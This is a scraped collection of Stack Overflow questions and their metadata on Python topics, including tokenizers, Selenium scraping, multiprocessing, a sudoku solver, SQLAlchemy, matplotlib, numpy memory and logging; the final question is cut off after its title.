<p>I created a custom BPE tokenizer for pre-training a Roberta model, utilizing the following parameters (I tried to align it with the default parameters of BPE for RoBERTa.):</p> <pre><code>from tokenizers.models import BPE from tokenizers import ByteLevelBPETokenizer from tokenizers.processors import RobertaProcessing tokenizer = ByteLevelBPETokenizer() tokenizer.normalizer = normalizers.BertNormalizer(lowercase = False) tokenizer.train_from_iterator(Data_full, vocab_size = 50264, min_frequency = 2, special_tokens = [&quot;&lt;s&gt;&quot;, &quot;&lt;pad&gt;&quot;, &quot;&lt;/s&gt;&quot;, &quot;&lt;unk&gt;&quot;]) tokenizer.add_special_tokens([&quot;&lt;mask&gt;&quot;]) tokenizer.post_processor = RobertaProcessing(sep = (&quot;&lt;/s&gt;&quot;, 2), cls = (&quot;&lt;s&gt;&quot;, 0), trim_offsets = False, add_prefix_space = False) tokenizer.enable_padding(direction = 'right', pad_id = 1, pad_type_id = 1, pad_token = &quot;&lt;pad&gt;&quot;, length = 512) </code></pre> <p>When pre-training a Roberta model with this tokenizer, I observe unusual behavior during the unmasking process:</p> <pre><code>from tokenizers import Tokenizer from transformers import pipeline from transformers import RobertaTokenizerFast tokenizer_in = Tokenizer.from_file('tokenizer_file') tokenizer_m = RobertaTokenizerFast(tokenizer_object=tokenizer_in, clean_up_tokenization_spaces=True) unmasker = pipeline('fill-mask', model=model_m, tokenizer = tokenizer_m) unmasker(&quot;Capital of France is &lt;mask&gt;.&quot;) </code></pre> <p>The output consistently appears as follows: <code>Capital of France is Paris</code>. I'm curious about the persistent extra space before 'Paris'. I believe activating the <code>clean_up_tokenization_spaces</code> option might resolve this. Could there be an error in my code leading to this issue? This happens for all unmasking tasks. Also, when I conduct a test with a command like <code>unmasker(&quot;Capital of France is&lt;mask&gt;.&quot;)</code>, the quality improves and the issue seems to be resolved.</p>
<python><huggingface-transformers><tokenize><huggingface><huggingface-tokenizers>
2024-01-14 16:03:00
1
3,823
Eghbal
77,815,713
1,208,142
Accessing element in web page using Selenium with Python
<p>I can't seem to be able to scrape the description on this page: <a href="https://www.centris.ca/fr/condo-appartement%7Ea-louer%7Ebrossard/17307615?view=Summary&amp;uc=6" rel="nofollow noreferrer">https://www.centris.ca/fr/condo-appartement~a-louer~brossard/17307615?view=Summary&amp;uc=6</a></p> <p>With this selector (which I copied from Chrome's inspector), Idon't get an error but an empty string. Any idea what &quot;by&quot; method I could use to access it?</p> <pre><code>from selenium import webdriver from selenium.webdriver.chrome.service import Service from webdriver_manager.chrome import ChromeDriverManager from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium_stealth import stealth # Selenium setup service = Service(ChromeDriverManager().install()) options = webdriver.ChromeOptions() options.add_argument(&quot;--headless&quot;) options.add_argument(&quot;start-maximized&quot;) options.add_experimental_option(&quot;excludeSwitches&quot;, [&quot;enable-automation&quot;]) options.add_experimental_option('useAutomationExtension', False) browser = webdriver.Chrome(service=service, options=options) browser.set_page_load_timeout(300) stealth(browser, languages=[&quot;en-US&quot;, &quot;en&quot;], vendor=&quot;Google Inc.&quot;, platform=&quot;Win32&quot;, webgl_vendor=&quot;Intel Inc.&quot;, renderer=&quot;Intel Iris OpenGL Engine&quot;, fix_hairline=True) url = 'https://www.centris.ca/fr/condo-appartement~a-louer~brossard/17307615?view=Summary&amp;uc=6' browser.get(url) browser.implicitly_wait(3) browser.maximize_window() # Extract necessary information url = browser.current_url print(&quot;URL:&quot;, url) descr = browser.find_element(By.CSS_SELECTOR, '#overview &gt; div.grid_3 &gt; div.row.description-row &gt; div.property-description.col-md-6 &gt; div:nth-child(2)').text print(descr) </code></pre>
<python><selenium-webdriver>
2024-01-14 15:59:00
3
5,347
Lucien S.
77,815,644
14,954,262
For loop with random number of conditions
<p>I have this code for filtering lists in Python:</p> <pre><code>column_to_check_for_include = [ 1, 2, ] # random result possible , could as well be [0] or [0,1,2] or whatever column_to_check_for_exclude = [ 0, 2, 3, ] # random result possible , could as well be [0] or [0,1,2] or whatever content = [ [&quot;John&quot;, &quot;is&quot;, &quot;cool&quot;, &quot;sometimes&quot;], [&quot;Paul&quot;, &quot;is&quot;, &quot;bad&quot;, &quot;everytime&quot;], [&quot;Ringo&quot;, &quot;may be&quot;, &quot;great&quot;, &quot;sometimes&quot;], [&quot;Georges&quot;, &quot;must be&quot;, &quot;small&quot;, &quot;yesterday&quot;], ] include_criteria = [&quot;is&quot;, &quot;must be&quot;] exclude_criteria = [&quot;bad&quot;, &quot;sometimes&quot;] for row in content: if all( exclude not in row[0] and exclude not in row[2] and exclude not in row[3] for exclude in exclude_criteria ): if any( include in row[1] or include in row[2] for include in include_criteria ): print(row) # output ['Georges', 'must be', 'small', 'yesterday'] </code></pre> <p>I would like to do the same by replacing all the <code>row[number]</code> by iterating through the lists <code>column_to_check_for_include</code> and <code>column_to_check_for_exclude</code>, knowing that those 2 lists content will change each time the user update them.</p> <p>Something like :</p> <pre><code>for row in content: if all( exclude not in row[column_to_check_for_exclude[0]] and exclude not in row[column_to_check_for_exclude[1]] and exclude not in row[column_to_check_for_exclude[2]] for exclude in exclude_criteria ): if any( include in row[column_to_check_for_include[0]] or include in row[column_to_check_for_include[1]] for include in include_criteria ): print(row) </code></pre> <p>Maybe I need to re-think the whole approach but I don't know how to deal with the fact that the number of conditions will change in the <code>if</code> statements (depending on the number of items in the lists).</p> <p>Thanks</p>
<python><for-loop><random>
2024-01-14 15:37:22
1
399
Nico44044
77,815,379
639,676
How to speed up data exchange between Python processes?
<p>I'm using Python's <code>multiprocessing</code> module for parallel processing of tasks. My goal is to have multiple processes work cooperatively on a set of tasks as efficiently as possible. To avoid duplicating work, I'm using a shared dictionary to track completed tasks. If a task is already completed by one process, other processes should skip it and pick a different task.</p> <p>However, I've encountered a performance bottleneck. The process of checking the shared dictionary for completed tasks is significantly slowing down the overall execution. Here's a simplified version of my code:</p> <pre><code>import multiprocessing import random def worker(shared_dict): for i in range(1000000): num = random.randint(1, 100000) if num not in shared_dict: shared_dict[num] = num**2 # computationally complex task if __name__ == &quot;__main__&quot;: # Create a manager and a shared dictionary manager = multiprocessing.Manager() shared_dict = manager.dict() # List to keep track of processes processes = [] # Create and start 5 processes for _ in range(5): p = multiprocessing.Process(target=worker, args=(shared_dict,)) processes.append(p) p.start() # Wait for all processes to complete for p in processes: p.join() print(shared_dict) </code></pre> <p>I used PySpy for profiling and noticed that a significant amount of time is spent in sending and receiving data from the shared dictionary (as shown in the attached profiling image).</p> <p><a href="https://i.sstatic.net/cZ4un.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/cZ4un.png" alt="enter image description here" /></a></p> <p>I'm looking for suggestions to optimize this data exchange. Is there a more efficient way to manage shared data in Python multiprocessing? How can I reduce the overhead associated with accessing and modifying the shared dictionary? I am willing to accept some duplications if it allows to dramatically increase performance</p>
<python><python-3.x><multiprocessing>
2024-01-14 14:17:23
0
4,143
Oleg Dats
77,815,182
10,544,569
In python how to update node at jsonpath with filter?
<p>I want to update node at json path with filtering (e.g. json path with such part &quot;[@.field]&quot;).</p> <p>My current attempts with jsonpath_ng failed:</p> <pre><code>import jsonpath_ng.ext import jsonpath_ng from hashlib import md5 # try several ways to transform {&quot;a&quot;: {&quot;b&quot;: &quot;c&quot;}} into {&quot;a&quot;: {1: 2}} for jpath_str in [&quot;$.a&quot;, &quot;$[?(@.b)]&quot;, &quot;$.a.b.`parent`&quot;]: for jp_lib in [jsonpath_ng, jsonpath_ng.ext]: obj = json.loads('{&quot;a&quot;: {&quot;b&quot;: &quot;c&quot;}}') print(f&quot;jp_lib={jp_lib.__name__:&lt;15} json_path_str={jpath_str:&lt;15}&quot;, end=&quot;\t&quot;) try: # find a node, and then attempt to update it jpath = jp_lib.parse(jpath_str) matches = jpath.find(obj) if not matches: print(&quot;--&gt; Not found&quot;) continue for match in matches: print(f&quot;match={md5(str(match).encode()).hexdigest()[:-10]}&quot;, end=&quot;\t&quot;) jpath.update(obj, {1:2}) print(f&quot;--&gt; result={obj}&quot;, end=&quot;\t&quot;) if &quot;b&quot; in obj['a']: print(&quot; --&gt;Update failed silently&quot;, end=&quot;\t&quot;) except Exception as ex: print(f&quot;--&gt; exception={type(ex).__name__}({ex})&quot;, end=&quot;\t&quot;) print() </code></pre> <p>Output:</p> <pre><code>jp_lib=jsonpath_ng json_path_str=$.a match=6d6c26aced0709ca568e84 --&gt; result={'a': {1: 2}} jp_lib=jsonpath_ng.ext json_path_str=$.a match=6d6c26aced0709ca568e84 --&gt; result={'a': {1: 2}} jp_lib=jsonpath_ng json_path_str=$[?(@.b)] --&gt; exception=JsonPathLexerError(Error on line 1, col 2: Unexpected character: ? ) jp_lib=jsonpath_ng.ext json_path_str=$[?(@.b)] match=6de1848d9db98d7d1c6766 --&gt; result={'a': {'b': 'c'}} --&gt;Update failed silently jp_lib=jsonpath_ng json_path_str=$.a.b.`parent` match=6d6c26aced0709ca568e84 --&gt; exception=NotImplementedError() jp_lib=jsonpath_ng.ext json_path_str=$.a.b.`parent` match=6d6c26aced0709ca568e84 --&gt; exception=NotImplementedError() </code></pre>
<python><jsonpath>
2024-01-14 13:18:08
1
1,325
IndustryUser1942
77,815,033
726,730
Python Aiortc Video delay (after some seconds remote video is frozzen
<p>I am trying to connect a browser peer with a server python peer.</p> <p>The code I use to stream server video is:</p> <pre class="lang-py prettyprint-override"><code> def create_local_tracks(self): global relay, webcam options = {&quot;video_size&quot;: &quot;640x480&quot;} if relay is None: if platform.system() == &quot;Darwin&quot;: webcam = MediaPlayer( &quot;default:none&quot;, format=&quot;avfoundation&quot;, options=options ) elif platform.system() == &quot;Windows&quot;:#this will be run webcam = MediaPlayer( &quot;video=HP True Vision HD Camera&quot;, format='dshow', options=options ) else: webcam = MediaPlayer(&quot;/dev/video0&quot;, format=&quot;v4l2&quot;, options=options) relay = MediaRelay() return relay.subscribe(webcam.video) </code></pre> <p>The problem is that in client side the stream-video starts but the latency is big. Furthermore, after some seconds the remote video in client almost froze.</p> <p>I am not sure this is related but i see this in console:</p> <pre><code>[swscaler @ 000001f35386bb40] deprecated pixel format used, make sure you did set range correctly </code></pre> <p>a lot of times.</p> <p>How can I decrease the server video delay in client (browser)?</p>
<python><webrtc><aiortc>
2024-01-14 12:27:52
0
2,427
Chris P
77,815,006
1,473,517
Find the optimal shift for max circle sum
<p>I have an n by n grid of integers which sits in an infinite grid and I want to find the circular area, with origin at (x, x) (notice that both dimensions are equal), with maximum sum. I assume that x &lt;= 0. Here is an illustration with n=10 of two circles with different centers and different radii. Only one quarter of the circles is shown as any part outside of the n by grid contributes zero to the sum.</p> <p>For a fixed circle center, there is an efficient method to find the radius which maximises the sum of the integers contained within a circle. The following <a href="https://stackoverflow.com/a/77795777/1473517">code</a> solves the problem.</p> <pre><code>from collections import Counter g = [[-3, 2, 2], [ 2, 0, 3], [-1, -2, 0]] n = 3 sum_dist = Counter() for i in range(n): for j in range(n): dist = i**2 + j**2 sum_dist[dist] += g[i][j] sorted_dists = sorted(sum_dist.keys()) for i in range(1, len(sorted_dists)): sum_dist[sorted_dists[i]] += sum_dist[sorted_dists[i-1]] print(sum_dist) print(max(sum_dist, key=sum_dist.get)) </code></pre> <p><a href="https://i.sstatic.net/3Unsh.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/3Unsh.png" alt="enter image description here" /></a></p> <p>However, if I were to set the center to (x, x) with x &lt; 0 instead the maximum possible sum may be different.</p> <p>How can I find the center and the radius which maximizes the sum of the integers within the circle?</p> <p>The data in the illustration is:</p> <pre><code> [[ 3, -1, 1, 0, -1, -1, -3, -2, -2, 2], [ 0, 0, 3, 0, 0, -1, 2, 0, -2, 3], [ 2, 0, 3, -2, 3, 1, 2, 2, 1, 1], [-3, 0, 1, 0, 1, 2, 3, 1, -3, -1], [-3, -2, 1, 2, 1, -3, -2, 2, -2, 0], [-1, -3, -3, 1, 3, -2, 0, 2, -1, 1], [-2, -2, -1, 2, -2, 1, -1, 1, 3, -1], [ 1, 2, -1, 2, 0, -2, -1, -1, 2, 3], [-1, -2, 3, -1, 0, 0, 3, -3, 3, -2], [ 0, -3, 0, -1, -1, 0, -2, -3, -3, -1]] </code></pre>
<python><algorithm><performance><math><optimization>
2024-01-14 12:18:45
1
21,513
Simd
77,814,939
5,798,365
Double elements of a list with specific indices stored in another list
<p>I have this list:</p> <pre><code>L=[10, 20, 30, 40, 50, 60, 70, 80, 90] </code></pre> <p>and a list of indices of the elements that should be doubled, for example:</p> <pre><code>dbl_indices = [0, 2, 5] </code></pre> <p>which should turn my list into:</p> <pre><code>[20, 20, 60, 40, 50, 120, 70, 80, 90] </code></pre> <p>Besides iterating in a <code>for</code>-loop over the list of indices, what is another, more Pythonic way of doing that?</p>
<python>
2024-01-14 11:57:54
2
861
alekscooper
77,814,924
1,351,182
How can I explicitly free numpy array memory?
<p>How can I explicitly free the memory associated with a <code>numpy</code> array?</p> <p>As usual on Stackexchange, there are numerous questions with more-or-less the same title, but with no correct answer.</p> <p>Here is an example of the problem:</p> <pre class="lang-py prettyprint-override"><code>import numpy as np big_arr = ... def process_big_arr(arr: np.ndarray) -&gt; np.ndarray: big_intermediate_arr_1 = ... # some function of `arr`. del arr # This will not trigger garbage collection because a reference # to `big_arr` still exists in the outer scope. big_intermediate_arr_2 = ... # Memory error here, because I'm out of RAM. # I want the input array `arr` to be destroyed. I won't be using it again. big_output_arr = ... return big_output_arr output = process_big_arr(big_arr) </code></pre> <p>I couldn't find in the <code>numpy</code> docs a function which <em>mutates</em> an array in such a way that it deallocates memory.</p> <p>Is there any way to do this? Perhaps by editing the properties of the numpy array and changing its memory pointer or something?</p>
<python><numpy><memory-management>
2024-01-14 11:53:24
3
924
Myridium
77,814,729
1,473,517
How to emphasise a part of a circle in matplotlib
<p>I have the following code:</p> <pre><code>import matplotlib.pyplot as plt from matplotlib.patches import Circle import numpy as np plt.yticks(np.arange(-10, 10.01, 1)) plt.xticks(np.arange(-10, 10.01, 1)) plt.xlim(-10,9) plt.ylim(-10,9) plt.gca().invert_yaxis() # Set aspect ratio to be equal plt.gca().set_aspect('equal', adjustable='box') plt.grid() np.random.seed(40) square = np.empty((10, 10), dtype=np.int_) for x in np.arange(0, 10, 1): for y in np.arange(0, 10, 1): plt.scatter(x, y, color='blue', s=2, zorder=2, clip_on=False) for x in np.arange(0, 10, 1): for y in np.arange(0, 10, 1): value = np.random.randint(-3, 4) square[int(x), int(y)] = value r1 = 3 circle1 = Circle((0, 0), r1, color=&quot;blue&quot;, alpha=0.5, ec='k', lw=1) r2 = 6 circle2 = Circle((0, 0), r2, color=&quot;blue&quot;, alpha=0.5, ec='k', lw=1) plt.gca().add_patch(circle1) plt.gca().add_patch(circle2) </code></pre> <p>This shows:</p> <p><a href="https://i.sstatic.net/OMR3I.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/OMR3I.png" alt="enter image description here" /></a></p> <p>However I would like only the quarter of the circles that are over the x, y ranges 0 to 9 to be colored in and the rest to have a white background.</p> <p>How can I do that?</p>
<python><matplotlib>
2024-01-14 10:48:52
1
21,513
Simd
77,814,353
4,872,985
Repeating values on recursive sudoku solver in python
<p>I'm trying to make a sudoku solver using recursion by storing possible values in a dictionary with index as key and the set of possible values as value. Parameter b is just the board expressed as a single list, and .get_row, .get_col, .get_box methods return their respective values properly. If an entry in the dictionary has a set with a single element then it gets put into the board b, otherwise if there's no possible set with a single element a value gets picked from the set of possible numbers and the recursion starts. This is the full repeatable code:</p> <pre><code>class Sudoku: def solve_it(self, board: List[List[str]]) -&gt; None: &quot;&quot;&quot; :param board: sudoku board gets modified inplace at .create_board_from_list :return: None &quot;&quot;&quot; unit_values = [] for i in range(len(board)): # flattening the board into unit_values for j in range(len(board[i])): unit_values.append(board[i][j]) self.go_through_recursive(board, unit_values) def get_row(self, n: int, b): # retrieve all elements of nth row in the board assert 0 &lt;= n &lt;= 8 return set(b[9 * n: 9 * (n + 1)]) def get_col(self, n: int, b): # retrieve all elements of nth col in the board assert 0 &lt;= n &lt;= 8 return set(b[n::9]) def get_box(self, n: int, b): # retrieve all elements of nth box in the board assert 0 &lt;= n &lt;= 8 return set(b[i] for i in range(81) if (i // 27) == (n // 3) and i % 9 // 3 == n % 3) def go_through_recursive(self, board, b, d=False): &quot;&quot;&quot; :param board: sudoku board as matrix where each row is a line :param b: sudoku board as a single long list &quot;&quot;&quot; numbers = {'1', '2', '3', '4', '5', '6', '7', '8', '9'} while True: if d: return True missing_dict = {} # populate missing_dict for idx in range(len(b)): if b[idx] == '.': row, col, box = idx // 9, idx % 9, (idx // 27) * 3 + (idx % 9) // 3 # union of all the present values in current row, col and box values = self.get_row(row, b).union(self.get_col(col, b)).union(self.get_box(box, b)) values.remove('.') missing_ones = numbers.difference(values) # possible values to input in the slot if len(missing_ones) == 0: # impossible to continue return False missing_dict[idx] = missing_ones old_count = b.count('.') # now we iterate through the dictionary of possible values per index, # if one index has a set with a single number it means that that's the only possible number so we store it for idx, missings in missing_dict.items(): # store assured values if len(missings) == 1: b[idx] = missings.pop() if b.count('.') == 0: # check if complete self.create_board_from_list(board, b) return True if b.count('.') == old_count: # if no progress has been made for idx, s in missing_dict.items(): # iterate through the dictionary for number in s: # create a new board and store indecisive value then recur if d: return True bb = b[:] bb[idx] = number d = self.go_through_recursive(board, bb) def create_board_from_list(self, board, b): temp_board = [] chunk = 9 for idx in range(0, len(b), chunk): temp_board.append(b[idx: idx + chunk]) for idx in range(len(board)): board[idx] = temp_board[idx] print('done') </code></pre> <p>The issue I have is that once it completes, some numbers are repeated(either in the rows, cols or boxes).Also I 've noticed that if I check the possible values inside the ' store assured values ' loop it sometimes returns the whole range [1, 9] possibly being the reason of some rewriting:</p> <pre><code>row, col, box = idx // 9, idx % 9, (idx // 27) * 3 + (idx % 9) // 3 values = self.get_row(row, b).union(self.get_col(col, b)).union(self.get_box(box, b)) values.remove('.') # some of these values are [1, 9] </code></pre> <p>Given this board input:</p> <pre><code>board = [[&quot;.&quot;,&quot;.&quot;,&quot;9&quot;,&quot;7&quot;,&quot;4&quot;,&quot;8&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;], [&quot;7&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;2&quot;,&quot;.&quot;,&quot;1&quot;,&quot;.&quot;,&quot;9&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;.&quot;,&quot;7&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;2&quot;,&quot;4&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;6&quot;,&quot;4&quot;,&quot;.&quot;,&quot;1&quot;,&quot;.&quot;,&quot;5&quot;,&quot;9&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;9&quot;,&quot;8&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;3&quot;,&quot;.&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;8&quot;,&quot;.&quot;,&quot;3&quot;,&quot;.&quot;,&quot;2&quot;,&quot;.&quot;], [&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;6&quot;], [&quot;.&quot;,&quot;.&quot;,&quot;.&quot;,&quot;2&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;.&quot;,&quot;.&quot;]] </code></pre> <p>the correct output is</p> <pre><code>board = [[&quot;5&quot;,&quot;1&quot;,&quot;9&quot;,&quot;7&quot;,&quot;4&quot;,&quot;8&quot;,&quot;6&quot;,&quot;3&quot;,&quot;2&quot;], [&quot;7&quot;,&quot;8&quot;,&quot;3&quot;,&quot;6&quot;,&quot;5&quot;,&quot;2&quot;,&quot;4&quot;,&quot;1&quot;,&quot;9&quot;], [&quot;4&quot;,&quot;2&quot;,&quot;6&quot;,&quot;1&quot;,&quot;3&quot;,&quot;9&quot;,&quot;8&quot;,&quot;7&quot;,&quot;5&quot;], [&quot;3&quot;,&quot;5&quot;,&quot;7&quot;,&quot;9&quot;,&quot;8&quot;,&quot;6&quot;,&quot;2&quot;,&quot;4&quot;,&quot;1&quot;], [&quot;2&quot;,&quot;6&quot;,&quot;4&quot;,&quot;3&quot;,&quot;1&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;], [&quot;1&quot;,&quot;9&quot;,&quot;8&quot;,&quot;5&quot;,&quot;2&quot;,&quot;4&quot;,&quot;3&quot;,&quot;6&quot;,&quot;7&quot;], [&quot;9&quot;,&quot;7&quot;,&quot;5&quot;,&quot;8&quot;,&quot;6&quot;,&quot;3&quot;,&quot;1&quot;,&quot;2&quot;,&quot;4&quot;], [&quot;8&quot;,&quot;3&quot;,&quot;2&quot;,&quot;4&quot;,&quot;9&quot;,&quot;1&quot;,&quot;7&quot;,&quot;5&quot;,&quot;6&quot;], [&quot;6&quot;,&quot;4&quot;,&quot;1&quot;,&quot;2&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;,&quot;3&quot;]] </code></pre> <p>while the code has the incorrect board</p> <pre><code>board = [[&quot;3&quot;,&quot;1&quot;,&quot;9&quot;,&quot;7&quot;,&quot;4&quot;,&quot;8&quot;,&quot;6&quot;,&quot;5&quot;,&quot;2&quot;], [&quot;7&quot;,&quot;8&quot;,&quot;5&quot;,&quot;6&quot;,&quot;3&quot;,&quot;2&quot;,&quot;1&quot;,&quot;1&quot;,&quot;9&quot;], [&quot;4&quot;,&quot;2&quot;,&quot;6&quot;,&quot;1&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;,&quot;7&quot;,&quot;3&quot;], [&quot;5&quot;,&quot;3&quot;,&quot;7&quot;,&quot;9&quot;,&quot;8&quot;,&quot;6&quot;,&quot;2&quot;,&quot;4&quot;,&quot;1&quot;], [&quot;2&quot;,&quot;6&quot;,&quot;4&quot;,&quot;3&quot;,&quot;1&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;], [&quot;1&quot;,&quot;9&quot;,&quot;8&quot;,&quot;5&quot;,&quot;2&quot;,&quot;4&quot;,&quot;3&quot;,&quot;6&quot;,&quot;7&quot;], [&quot;9&quot;,&quot;7&quot;,&quot;1&quot;,&quot;8&quot;,&quot;6&quot;,&quot;3&quot;,&quot;4&quot;,&quot;2&quot;,&quot;5&quot;], [&quot;8&quot;,&quot;5&quot;,&quot;2&quot;,&quot;4&quot;,&quot;9&quot;,&quot;1&quot;,&quot;7&quot;,&quot;3&quot;,&quot;6&quot;], [&quot;6&quot;,&quot;4&quot;,&quot;3&quot;,&quot;2&quot;,&quot;7&quot;,&quot;5&quot;,&quot;9&quot;,&quot;8&quot;,&quot;4&quot;]] </code></pre> <p>EDIT:</p> <p>I changed the <code>go_through_recursive</code> to store the unique possible value directly into the board, in this case the only possible set length in the dictionary is 2 or greater. But this seems to get stuck in an infinite loop</p> <pre><code> def go_through_recursive(self, board, b, d=False): &quot;&quot;&quot; :param board: sudoku board as matrix where each row is a line :param b: sudoku board as a single long list &quot;&quot;&quot; numbers = {'1', '2', '3', '4', '5', '6', '7', '8', '9'} while True: old_count = b.count('.') missing_dict = {} # populate missing_dict for idx in range(len(b)): if b[idx] == '.': row, col, box = idx // 9, idx % 9, (idx // 27) * 3 + (idx % 9) // 3 # union of all the present values in current row, col and box values = self.get_row(row, b).union(self.get_col(col, b)).union(self.get_box(box, b)) values.remove('.') missing_ones = numbers.difference(values) # possible values to input in the slot if len(missing_ones) == 0: # impossible to continue return False elif len(missing_ones) == 1: b[idx] = missing_ones.pop() else: missing_dict[idx] = missing_ones if b.count('.') == 0: # check if complete self.create_board_from_list(board, b) return True if b.count('.') == old_count: # if no progress has been made for idx, s in missing_dict.items(): # iterate through the dictionary for number in s: # create a new board and store indecisive value then recur bb = b[:] bb[idx] = number if self.go_through_recursive(board, bb): return True </code></pre>
<python><algorithm><sudoku>
2024-01-14 08:29:31
1
616
Fabio Olivetto
77,814,328
5,459,343
Consistent characters with DALL E-3 and python API
<p>How can I generate consistent characters across multiple images using the OpenAI Python API for DALL-E 3? I've successfully achieved this by directly prompting the model on the OpenAI website (e.g., by referencing a seed number), but I'm uncertain about replicating the same behavior through the API. Any guidance or examples would be appreciated.</p>
<python><openai-api><image-generation>
2024-01-14 08:18:57
0
573
J.K.
77,814,327
5,798,365
Sorting in the ascending and then in the descending order in Python without negation
<p>I have this list:</p> <pre><code>L = [(1, 'a'), (4, 'k'), (3, 'p'), (3, 'q'), (2, 'a'), (2, 'b'), (1, 'z')] </code></pre> <p>which I want to sort in the ascending order by the 0th element of each tuple and <em>then</em> in the descending order by the 1st one. What's the way to do that?</p> <p>I could use the general approach:</p> <pre><code>L.sort(key=lambda x: (x[0], -x[1])) </code></pre> <p>but it's impossible because there's no <code>-</code> operation for strings.</p> <p>How should I call <code>sort</code> to get what I need?</p>
<python><sorting>
2024-01-14 08:18:48
2
861
alekscooper
77,814,292
4,281,998
Sqlalchemy: for loop over related collection skips items
<p>I'm trying to iterate through a related collection (<code>user.addresses</code> below), and disassociate all of them from the parent <code>User</code>. When I set a breakpoint in the loop, my debugger shows the collection has say 3 items, but advancing execution may only hit the breakpoint one more time. In all of my testing it has never iterated through the whole collection. This reflects in the DELETE statements, it does not delete all related Addresses.</p> <p>I striped/trimmed down this code from a fastapi project.</p> <pre class="lang-py prettyprint-override"><code>from sqlalchemy import String, ForeignKey, select, delete from sqlalchemy.ext.asyncio import AsyncSession from sqlalchemy.orm import ( DeclarativeBase, Mapped, mapped_column, relationship, selectinload, ) class Base(DeclarativeBase): pass class User(Base): __tablename__ = &quot;user_account&quot; id: Mapped[int] = mapped_column(primary_key=True) name: Mapped[str] = mapped_column(String(30)) fullname: Mapped[str | None] addresses: Mapped[list[&quot;Address&quot;]] = relationship(back_populates=&quot;user&quot;, cascade=&quot;save-update, merge, delete, delete-orphan&quot;) def __repr__(self) -&gt; str: return f&quot;User(id={self.id!r}, name={self.name!r}, fullname={self.fullname!r})&quot; class Address(Base): __tablename__ = &quot;address&quot; id: Mapped[int] = mapped_column(primary_key=True) email_address: Mapped[str] user_id = mapped_column(ForeignKey(&quot;user_account.id&quot;)) user: Mapped[User] = relationship(back_populates=&quot;addresses&quot;) def __repr__(self) -&gt; str: return f&quot;Address(id={self.id!r}, email_address={self.email_address!r})&quot; async def update_user(id: int, new_user, db: AsyncSession) -&gt; User: result = await db.scalars(select(User).filter_by(id=id).options(selectinload(User.addresses))) user = result.first() # not relevant to question if user is None: pass user.name = new_user.name user.fullname = new_user.fullname for address in user.addresses: address.user = None # BREAKPOINT HERE for address in new_user.addresses: db.add(Address(email_address=address.email_address, user=user)) await db.flush() return user </code></pre>
<python><sqlalchemy><python-asyncio>
2024-01-14 08:02:26
1
3,611
Brady Dean
77,814,150
2,964,170
How to find the next element using Python Selenium
<pre><code> browser.find_element(By.ID,'thread-0-list') browser.find_element(By.ID,'tpz_body') browser.find_element(By.ID,'view') browser.find_element(By.ID,'topaz') browser.find_element(By.ID,'X1') browser.find_element('id','X4') browser.find_element('id','X7') browser.find_element('id','X9') -- empty elements </code></pre> <p><a href="https://i.sstatic.net/fkE77.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/fkE77.png" alt="'X9' inside the 'X4' but return emtpy" /></a><a href="https://i.sstatic.net/14UTF.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/14UTF.png" alt="empty elements from X1Container" /></a> I would like say thank you for your support. The child div are return empty how to check next available element using selenium python</p> <p><a href="https://i.sstatic.net/dn2zw.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/dn2zw.png" alt="next element showing empty object " /></a></p> <pre><code>browser.find_elements(By.XPATH, &quot;//*[@id='X7']&quot;) --- find the element but browser.find_elements(By.XPATH, &quot;//*[@id='X9']&quot;) -- empty element </code></pre>
<python><selenium-webdriver><selenium-chromedriver>
2024-01-14 06:41:57
2
425
Vas
77,813,880
1,397,922
How to hide fields in order_line based on some value of their parent (order_id) in Odoo v16?
<p>Is there any way to hide some fields in purchase order line based on some conditions/value of their parent (order_id). I've tried this way:</p> <pre><code>&lt;field name=&quot;price_subtotal&quot; attrs=&quot;{'invisible': [('order_id.currency_id.name', '=', 'IDR')]}&quot;/&gt; </code></pre> <p>But unfortunately, this one only works with Odoo v7 and lower. I use v16 by the way. Thanks in advance.</p>
<python><xml><odoo>
2024-01-14 03:47:54
1
550
Andromeda
77,813,551
5,896,591
Python2.7: How to create a new StreamHandler without losing the module name on each output line?
<p>I want to replace the default <code>StreamHandler</code>, to redirect output to a different stream. However, when I create a new <code>StreamHandler</code>, the module name no longer appears in logging output:</p> <pre><code>import logging logging.basicConfig(level = logging.INFO) LOG = logging.getLogger(__name__) for handler in logging.getLogger().handlers: logging.getLogger().removeHandler(handler) logging.getLogger().addHandler(logging.StreamHandler()) # without the above 3 lines: INFO:__main__:hello # with the above 3 lines: hello LOG.info('hello') </code></pre> <p>Is it possible to create a new <code>StreamHandler</code> without losing the module name on each output line?</p>
<python><python-2.7><logging><python-logging>
2024-01-14 00:13:36
1
4,630
personal_cloud
77,813,470
13,281,808
Django rest framework is providing the wrong parameters to custom permission class
